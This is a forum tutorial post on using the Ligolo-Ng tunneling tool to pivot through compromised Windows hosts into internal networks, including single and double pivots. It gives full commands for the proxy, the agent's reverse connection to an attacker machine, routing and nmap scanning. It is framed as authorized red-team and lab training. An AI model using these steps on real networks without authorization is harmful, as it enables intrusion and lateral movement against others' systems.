Ligolo-Ng Pivoting Guide for Red Teams

x32x01
  • by x32x01 ||
Ligolo-Ng is a powerful tunneling tool used in penetration testing and red team engagements to perform lateral movement inside internal networks.
In this detailed guide, you’ll learn how Ligolo-Ng works, how to set it up, and how to perform single and double pivoting in a controlled lab environment.
⚠️ Important: This guide is strictly for authorized penetration testing, cybersecurity labs, and educational purposes. Never test systems without proper permission.

What Is Ligolo-Ng? 🧠​

Ligolo-Ng is a lightweight tunneling tool developed by Nicolas Chatelain. It creates reverse TCP/TLS tunnels using a TUN interface, allowing attackers (or testers) to pivot across networks without relying on SOCKS proxies.
Key features:
  • Written in Go (fast and portable) ⚡
  • Reverse TCP/TLS tunneling 🔒
  • TUN interface support (VPN-like behavior) 🌐
  • Supports ICMP, UDP, SYN scans
  • High-speed connections (up to 100 Mbps)
  • Minimal footprint on target systems
Ligolo-Ng is especially useful in internal network pivoting scenarios.


Ligolo-Ng vs Chisel 🔍​

Both Ligolo and Chisel are pivoting tools, but there are differences:
  • Ligolo-Ng is faster and more flexible
  • Chisel uses a classic client-server SOCKS model
  • Ligolo uses a TUN interface (acts like a VPN tunnel)
  • Ligolo supports ICMP, UDP, SYN scanning
  • Chisel primarily relies on HTTP/WebSocket
For complex internal network pivoting, Ligolo-Ng offers more advanced functionality.


Lab Setup Overview 🖥️​

Typical lab scenario:
  • Attacker machine (Kali Linux)
  • Compromised Windows machine (Network B)
  • Another internal network (Network C)
Goal:
  • Perform Single Pivot (Network A → Network B)
  • Perform Double Pivot (Network A → Network B → Network C)


Installing and Setting Up Ligolo-Ng ⚙️​

Step 1: Create TUN Interface on Kali​

Code: 
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify:
Code: 
ifconfig
This creates the virtual interface used for tunneling.

Step 2: Extract the Proxy File​

Code: 
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
View options:
Code: 
./proxy -h
Start proxy with self-signed certificate:
Code: 
./proxy -selfcert
Default listening port: 11601

Step 3: Deploy Agent on Target (Windows)​

Extract the agent file on Windows and run:
Code: 
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Once executed, a session will appear on the Kali proxy.
Use:
Code: 
session
Select session and run:
Code: 
ifconfig
This reveals internal network interfaces.


Single Pivoting Using Ligolo-Ng 🔄​

Goal: Access Network B from Network A.

Step 1: Add Route​

If internal network is 192.168.148.0/24:
Code: 
ip route add 192.168.148.0/24 dev ligolo
ip route list

Step 2: Start Tunnel​

Inside proxy session:
Code: 
start
Now you can:
  • Ping internal hosts
  • Run Nmap scans
  • Perform enumeration
Example:
Code: 
nmap -sC -sV 192.168.148.132
Single pivoting is now complete.


Double Pivoting with Ligolo-Ng 🔁​

Goal: Reach Network C via Network B.

Step 1: Gain Access to Second Internal Machine​

After accessing Network B, upload and execute the Ligolo agent on a second internal Windows machine.
Code: 
agent.exe -connect 192.168.1.5:11601 -ignore-cert
A new session will appear.

Step 2: Add Route for Network C​

If new network is 192.168.159.0/24:
Code: 
ip route add 192.168.159.0/24 dev ligolo
ip route list

Step 3: Stop First Tunnel​

Inside session 1:
Code: 
stop
Switch to session 2 and start:
Code: 
start

Step 4: Add Listener for Double Pivot​

Code: 
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
This enables traffic forwarding across both pivots.
Now you can scan Network C:
Code: 
nmap 192.168.159.0/24
Double pivoting successfully established.


Why Ligolo-Ng Is Powerful for Red Teaming 🎯​

Ligolo-Ng enables:
  • Internal network enumeration
  • Cross-subnet scanning
  • Pivot chaining
  • Active Directory lateral movement
  • Multi-hop access
Because it uses a TUN interface, tools like Nmap, CrackMapExec, and Impacket work natively without SOCKS proxy configuration.


Security & Ethical Usage Reminder 🔐​

Ligolo-Ng is designed for:
  • Authorized penetration tests
  • Red team operations
  • Cybersecurity labs
  • Training and certification practice
Never use pivoting tools on networks without explicit permission.
Unauthorized access is illegal and unethical.


Final Thoughts 💡​

Ligolo-Ng is one of the most efficient and modern pivoting tools available for cybersecurity professionals.
Its speed, flexibility, and VPN-like tunneling make it ideal for advanced lateral movement and internal reconnaissance in controlled environments.
If you’re preparing for red team certifications or real-world penetration testing, mastering Ligolo-Ng will significantly improve your internal network exploitation skills.
Stay ethical. Stay authorized. Stay professional 🛡️🔥
 
Last edited:

Related Threads

x32x01
AI Phishing Explained: Risks & Defense Tips
  • x32x01
Replies
0
Views
537
x32x01
x32x01
x32x01
Jenkins Penetration Testing Guide
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Types of Hackers Explained Clearly
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Start a Career in Ethical Hacking Today
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
x32x01
Ethical Hacking Guide: Types & Common Attacks
  • x32x01
Replies
0
Views
1K
x32x01
x32x01
TAGs: Tags
active directory pivoting cybersecurity labs ethical hacking internal network enumeration lateral movement ligolo-ng network pivoting penetration testing tools red team operations tunneling techniques
Register & Login Faster
Forgot your password?

Latest Posts

Latest Resources

Forum Statistics
Threads
742
Messages
747
Members
71
Latest Member
Mariaunmax
Back
Top